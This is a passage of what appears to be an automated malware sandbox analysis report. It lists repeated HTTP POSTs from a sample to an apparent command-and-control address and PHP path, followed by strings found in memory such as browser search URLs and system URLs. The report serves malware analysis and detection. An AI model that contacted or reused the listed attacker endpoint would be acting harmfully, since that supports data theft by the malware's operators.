                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2108Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2108Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2504Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2080Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continue
                          Source: unknownHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000003084000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000003320000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000003199000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.110.194.28
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000003084000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000003320000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000003199000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWind
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000003320000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.110.H
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000003320000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.110.Hx;
                          Source: powershell.exe, 00000007.00000002.2748232345.000001FDC0C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
                          Source: svchost.exe, 0000001A.00000002.2929703953.000001D5AB400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                          Source: svchost.exe, 0000001A.00000003.2063367474.000001D5AB288000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr, edb.log.26.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                          Source: edb.log.26.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                          Source: edb.log.26.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                          Source: edb.log.26.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                          Source: svchost.exe, 0000001A.00000003.2063367474.000001D5AB288000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr, edb.log.26.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                          Source: svchost.exe, 0000001A.00000003.2063367474.000001D5AB288000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr, edb.log.26.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                          Source: svchost.exe, 0000001A.00000003.2063367474.000001D5AB2BD000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr, edb.log.26.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                          Source: edb.log.26.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                          Source: powershell.exe, 00000008.00000002.2601427075.0000015493297000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2643181004.000002591A8C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2669056300.000001BD77E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                          Source: powershell.exe, 0000000D.00000002.2029361169.000001BD67FC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                          Source: powershell.exe, 00000007.00000002.2023418258.000001FDA8C88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2012310571.0000015483449000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2018884103.000002199CD18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2017450916.000002590AA78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2029361169.000001BD67FC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                          Source: hypersurrogateComponentdhcp.exe, 00000005.00000002.1889265427.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2023418258.000001FDA8A61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2012310571.0000015483221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2018884103.000002199CAF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2017450916.000002590A851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2029361169.000001BD67DA1000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: powershell.exe, 00000007.00000002.2023418258.000001FDA8C88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2012310571.0000015483449000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2018884103.000002199CD18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2017450916.000002590AA78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2029361169.000001BD67FC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                          Source: powershell.exe, 0000000A.00000002.2753998400.00000219B508A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wicrosoft.com/PKI/docs/CPS/default.htm0
                          Source: powershell.exe, 0000000A.00000002.2753998400.00000219B502E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwoft.com/pki/cert
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                          Source: powershell.exe, 0000000D.00000002.2029361169.000001BD67FC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                          Source: powershell.exe, 00000008.00000002.2776538231.000001549B62D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsofm/pki/certs/MicRooCerAut_2010-06-23.crt0
                          Source: powershell.exe, 0000000D.00000002.2794838797.000001BD7FDA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                          Source: zSQAoKuSDj.24.dr, ONpBu9lcdX.24.dr, 3c8MSY2kPb.24.dr, nE8AJOFfyQ.24.dr, ySQF7nQAph.24.dr, vhc6TzHo0M.24.dr, EK6xeVi4QL.24.dr, WAOW92WiBP.24.dr, tudHfmU2wN.24.dr, IgLlwAztHD.24.dr, 54t12C5XRW.24.dr, XsLHRYlmRG.24.dr, gTDswP1uzF.24.dr, IH2FLS5YIm.24.dr, EI9cgKzK2a.24.dr, oz0rvzAMwL.24.dr, qjLTYIx5bn.24.dr, MsBbgpRl97.24.dr, k9WQ8LJ8Xb.24.dr, VcGfTunSmk.24.dr, M8C0OCeSN5.24.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: powershell.exe, 00000007.00000002.2023418258.000001FDA8A61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2012310571.0000015483221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2018884103.000002199CAF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2017450916.000002590A851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2029361169.000001BD67DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                          Source: zSQAoKuSDj.24.dr, ONpBu9lcdX.24.dr, 3c8MSY2kPb.24.dr, nE8AJOFfyQ.24.dr, ySQF7nQAph.24.dr, vhc6TzHo0M.24.dr, EK6xeVi4QL.24.dr, WAOW92WiBP.24.dr, tudHfmU2wN.24.dr, IgLlwAztHD.24.dr, 54t12C5XRW.24.dr, XsLHRYlmRG.24.dr, gTDswP1uzF.24.dr, IH2FLS5YIm.24.dr, EI9cgKzK2a.24.dr, oz0rvzAMwL.24.dr, qjLTYIx5bn.24.dr, MsBbgpRl97.24.dr, k9WQ8LJ8Xb.24.dr, VcGfTunSmk.24.dr, M8C0OCeSN5.24.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: zSQAoKuSDj.24.dr, ONpBu9lcdX.24.dr, 3c8MSY2kPb.24.dr, nE8AJOFfyQ.24.dr, ySQF7nQAph.24.dr, vhc6TzHo0M.24.dr, EK6xeVi4QL.24.dr, WAOW92WiBP.24.dr, tudHfmU2wN.24.dr, IgLlwAztHD.24.dr, 54t12C5XRW.24.dr, XsLHRYlmRG.24.dr, gTDswP1uzF.24.dr, IH2FLS5YIm.24.dr, EI9cgKzK2a.24.dr, oz0rvzAMwL.24.dr, qjLTYIx5bn.24.dr, MsBbgpRl97.24.dr, k9WQ8LJ8Xb.24.dr, VcGfTunSmk.24.dr, M8C0OCeSN5.24.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: zSQAoKuSDj.24.dr, ONpBu9lcdX.24.dr, 3c8MSY2kPb.24.dr, nE8AJOFfyQ.24.dr, ySQF7nQAph.24.dr, vhc6TzHo0M.24.dr, EK6xeVi4QL.24.dr, WAOW92WiBP.24.dr, tudHfmU2wN.24.dr, IgLlwAztHD.24.dr, 54t12C5XRW.24.dr, XsLHRYlmRG.24.dr, gTDswP1uzF.24.dr, IH2FLS5YIm.24.dr, EI9cgKzK2a.24.dr, oz0rvzAMwL.24.dr, qjLTYIx5bn.24.dr, MsBbgpRl97.24.dr, k9WQ8LJ8Xb.24.dr, VcGfTunSmk.24.dr, M8C0OCeSN5.24.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: powershell.exe, 0000000D.00000002.2669056300.000001BD77E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                          Source: powershell.exe, 0000000D.00000002.2669056300.000001BD77E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                          Source: powershell.exe, 0000000D.00000002.2669056300.000001BD77E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                          Source: zSQAoKuSDj.24.dr, ONpBu9lcdX.24.dr, 3c8MSY2kPb.24.dr, nE8AJOFfyQ.24.dr, ySQF7nQAph.24.dr, vhc6TzHo0M.24.dr, EK6xeVi4QL.24.dr, WAOW92WiBP.24.dr, tudHfmU2wN.24.dr, IgLlwAztHD.24.dr, 54t12C5XRW.24.dr, XsLHRYlmRG.24.dr, gTDswP1uzF.24.dr, IH2FLS5YIm.24.dr, EI9cgKzK2a.24.dr, oz0rvzAMwL.24.dr, qjLTYIx5bn.24.dr, MsBbgpRl97.24.dr, k9WQ8LJ8Xb.24.dr, VcGfTunSmk.24.dr, M8C0OCeSN5.24.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: zSQAoKuSDj.24.dr, ONpBu9lcdX.24.dr, 3c8MSY2kPb.24.dr, nE8AJOFfyQ.24.dr, ySQF7nQAph.24.dr, vhc6TzHo0M.24.dr, EK6xeVi4QL.24.dr, WAOW92WiBP.24.dr, tudHfmU2wN.24.dr, IgLlwAztHD.24.dr, 54t12C5XRW.24.dr, XsLHRYlmRG.24.dr, gTDswP1uzF.24.dr, IH2FLS5YIm.24.dr, EI9cgKzK2a.24.dr, oz0rvzAMwL.24.dr, qjLTYIx5bn.24.dr, MsBbgpRl97.24.dr, k9WQ8LJ8Xb.24.dr, VcGfTunSmk.24.dr, M8C0OCeSN5.24.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: zSQAoKuSDj.24.dr, ONpBu9lcdX.24.dr, 3c8MSY2kPb.24.dr, nE8AJOFfyQ.24.dr, ySQF7nQAph.24.dr, vhc6TzHo0M.24.dr, EK6xeVi4QL.24.dr, WAOW92WiBP.24.dr, tudHfmU2wN.24.dr, IgLlwAztHD.24.dr, 54t12C5XRW.24.dr, XsLHRYlmRG.24.dr, gTDswP1uzF.24.dr, IH2FLS5YIm.24.dr, EI9cgKzK2a.24.dr, oz0rvzAMwL.24.dr, qjLTYIx5bn.24.dr, MsBbgpRl97.24.dr, k9WQ8LJ8Xb.24.dr, VcGfTunSmk.24.dr, M8C0OCeSN5.24.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: svchost.exe, 0000001A.00000003.2063367474.000001D5AB332000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr, edb.log.26.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                          Source: edb.log.26.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                          Source: edb.log.26.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                          Source: edb.log.26.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                          Source: svchost.exe, 0000001A.00000003.2063367474.000001D5AB332000.00000004.00000800.00020000.00000000.sdmp, edb.log.26.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                          Source: powershell.exe, 0000000D.00000002.2029361169.000001BD67FC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                          Source: powershell.exe, 00000008.00000002.2601427075.0000015493297000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2643181004.000002591A8C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2669056300.000001BD77E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                          Source: svchost.exe, 0000001A.00000003.2063367474.000001D5AB332000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr, edb.log.26.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                          Source: edb.log.26.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                          Source: UJ59LdJnt9.24.drString found in binary or memory: https://support.mozilla.org
                          Source: UJ59LdJnt9.24.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                          Source: UJ59LdJnt9.24.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013337000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.000000001337D000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013ACF000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013B15000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013A43000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.000000001320D000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013181000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000131C7000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000146AE000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000139FD000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000130F5000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000130AF000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.000000001313B000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013069000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013023000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013A89000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000012FDD000.00000004.00000800.00020000.00000000.sdmp, MPtwnE9hJ7.24.dr, fzcLEMqFWg.24.dr, fDVZda3fuM.24.dr, oDJgYeWmJB.24.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
